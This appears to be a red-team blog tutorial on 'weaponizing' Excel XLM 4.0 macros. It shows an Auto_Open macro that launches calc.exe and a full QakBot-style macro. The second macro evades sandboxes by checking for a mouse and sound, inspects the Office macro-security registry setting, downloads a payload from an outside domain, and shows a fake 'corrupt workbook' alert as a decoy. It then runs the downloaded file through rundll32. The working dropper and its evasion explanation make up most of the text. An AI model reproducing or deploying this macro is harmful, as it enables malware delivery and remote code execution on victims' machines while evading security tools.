Weaponizing XLM 4.0 macros

XLM macros a part of the Microsoft Office suite, and are an amazing resource to implement an initial foothold scenario to execute payloads in a red teaming exercise. This scenario is inspired on the following malwares that abuse XLM macro to load the first stage into the memory.

Playing with XML Macros

To start this laboratory, the first step is to create the XML macro inside an Excel document.

Click on "Sheet" / Right click / Add "XML Macro 4.0" / OK

After that, a new sheet will be created as presented below.

As a first test, we can execute "calc.exe" process when the macro is opened.

=EXEC("calc.exe")
=HALT()

Note how we need to rename the A1 cell to Auto_Open if we want the Macros to fire off once the document is opened:

After that, we can "save" our first PoC. Remember to save the document with Seet with privileges to execute Excel Macros (at the top of the options).

As expected, the calc.exe is launched when the excel file is opened. 😎

Weaponizing XML macros

In order to perform a more complex scenario, we can simply adopt the approach used for instance by QakBot trojan malware.

=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH(“Windows”,GET.WORKSPACE(1))), ,CLOSE(TRUE))
=CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\reg.exe”,”EXPORT HKCU\Software\Microsoft\Office\”&GET.WORKSPACE(2)&”\Excel\Security c:\users\public\1.reg /y”,0,5)
=WAIT(NOW()+”00:00:03″)
=FOPEN(“c:\users\public\1.reg”)
=FPOS(R[-1]C, 215)
=FREAD(R[-2]C, 255)
=FCLOSE(R[-3]C)
=FILE.DELETE(“c:\users\public\1.reg”)
=IF(ISNUMBER(SEARCH(“0001”,R[-3]C)),CLOSE(FALSE),)
=CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\csg75ef.html”,0,0)
=IF(R[-1]C<0,CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\bwep5ef.html”,0,0),)
=ALERT(“The workbook cannot be opened or repaired by Microsoft Excel because it’s corrupt.”,2)
=CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\rundll32.exe”,”c:\Users\Public\csg75ef.html,DllRegisterServer”,0,5)
=CLOSE(FALSE)

The first two lines in the code are a particular highlight. These lines are actually an anti-evasion technique used to identify whether the file is facing a human or a machine (a sandbox). The GET.WORKSPACE() command gathers information about the properties of the environment. Each property is referenced by a number.

The documentation for the two investigated properties is as follows:

  • 19: If a mouse is present, returns TRUE; otherwise, returns FALSE.

  • 42: If your computer is capable of playing sounds, returns TRUE; otherwise, return FALSE.

These two properties, when being negative, are a fairly good indication for the malware to “understand” if it run inside a sandbox. Hence, the =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) statement basically means that if the code is running inside a sandbox, it needs to “bail-out”, and avoid continuing to the malicious parts of the macro. This allows the sample to evade some dynamic security products that lack the proper emulation of such characteristics.